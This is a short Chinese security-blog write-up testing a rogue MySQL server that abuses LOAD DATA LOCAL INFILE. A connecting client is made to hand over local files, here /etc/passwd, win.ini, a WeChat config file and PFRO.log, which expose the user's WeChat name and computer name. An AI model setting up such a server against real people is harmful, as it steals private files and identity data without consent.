微慑信息网

伪造MYSQL服务器获取攻击者本地信息测试

参考:

https://www.freebuf.com/articles/web/247976.html

https://www.colabug.com/2019/0408/5936906/

https://github.com/allyshka/Rogue-MySql-Server


阅读理解:

通过对正常连接mysql流程的抓包,构造在本地指点端口的监听,并伪造mysql与客户端的数据发包,从而诱导攻击者执行

load data local infile ‘/etc/passwd’ into table test fields terminated by ‘\n’;

测试:

执行rogue_mysql_server.py后,本地监听3306端口,

使用navicat工具对目标地址进行连接:

脚本中加载文件读取列表:

filelist = (
r’c:\boot.ini’,
r’c:\windows\win.ini’,
r’X:\My Documents\Documents\WeChat Files\All Users\config\config.data’,
r’C:\Windows\PFRO.log’,
)

由于不存在boot.ini 故报错;

此时查看目录下mysql.log文件内容,即为读取到的文件信息:

其中读取微信名文件为:

\WeChat Files\All Users\config\config.data

电脑文件名为:

C:\Windows\PFRO.log

 

 

 

 

 

 

 

.

赞(0) 打赏
转载请附本站链接,未经允许不得转载,,谢谢:微慑信息网-VulSee.com » 伪造MYSQL服务器获取攻击者本地信息测试

评论 抢沙发

微慑信息网 专注工匠精神

微慑信息网-VulSee.com-关注前沿安全态势,聚合网络安全漏洞信息,分享安全文档案例

访问我们联系我们

觉得文章有用就打赏一下文章作者

非常感谢你的打赏,我们将继续提供更多优质内容,让我们一起创建更加美好的网络世界!

支付宝扫一扫打赏

微信扫一扫打赏

登录

找回密码

注册